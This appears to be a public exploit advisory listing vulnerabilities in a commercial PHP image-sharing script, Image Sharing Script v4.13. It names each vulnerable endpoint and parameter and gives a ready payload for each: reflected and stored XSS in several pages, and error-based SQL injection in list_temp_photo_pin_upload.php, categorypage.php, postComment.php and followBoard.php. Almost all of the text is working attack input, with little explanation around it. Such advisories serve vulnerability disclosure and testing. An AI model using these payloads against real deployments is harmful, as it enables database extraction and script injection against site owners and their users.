62 lines
No EOL
2.3 KiB
Text
62 lines
No EOL
2.3 KiB
Text
Exploit Title : Image Sharing Script v4.13 - Multiple Vulnerability
|
|
Author : Hasan Emre Ozer
|
|
Google Dork : -
|
|
Date : 16/01/2017
|
|
Type : webapps
|
|
Platform: PHP
|
|
Vendor Homepage : http://itechscripts.com/image-sharing-script/
|
|
Sofware Price and Demo : $1250
|
|
http://photo-sharing.itechscripts.com/
|
|
|
|
--------------------------------
|
|
Type: Reflected XSS
|
|
Vulnerable URL: http://localhost/[PATH]/searchpin.php
|
|
Vulnerable Parameters : q=
|
|
Payload:"><img src=i onerror=prompt(1)>
|
|
-------------------------------
|
|
Type: Error Based Sql Injection
|
|
Vulnerable URL:http://localhost/[PATH]/list_temp_photo_pin_upload.php
|
|
Vulnerable Parameters: pid
|
|
Method: GET
|
|
Payload: ' AND (SELECT 2674 FROM(SELECT
|
|
COUNT(*),CONCAT(0x717a717671,(SELECT
|
|
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
|
|
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
|
|
-------------------------------
|
|
Type: Error Based Sql Injection
|
|
Vulnerable URL:http://localhost/[PATH]/categorypage.php
|
|
Vulnerable Parameters: token
|
|
Method: GET
|
|
Payload: ' AND (SELECT 2674 FROM(SELECT
|
|
COUNT(*),CONCAT(0x717a717671,(SELECT
|
|
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
|
|
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
|
|
|
|
--------------------------------
|
|
Type: Reflected XSS
|
|
Vulnerable URL: http://localhost/[PATH]/categorypage.php
|
|
Vulnerable Parameters : token
|
|
Payload:"><img src=i onerror=prompt(1)>
|
|
|
|
-------------------------------
|
|
Type: Stored XSS
|
|
Vulnerable URL: http://localhost/[PATH]/ajax-files/postComment.php
|
|
Method: POST
|
|
Vulnerable Parameters : &text=
|
|
Payload:<img src=i onerror=prompt(1)>
|
|
--------------------------------
|
|
Type: Error Based Sql Injection
|
|
Vulnerable URL:http://localhost/[PATH]/ajax-files/postComment.php
|
|
Vulnerable Parameters: id
|
|
Method: POST
|
|
Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT
|
|
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
|
|
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
|
|
---------------------------------
|
|
Type: Error Based Sql Injection
|
|
Vulnerable URL:http://localhost/[PATH]//ajax-files/followBoard.php
|
|
Vulnerable Parameters: brdId
|
|
Method: POST
|
|
Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT
|
|
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
|
|
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH |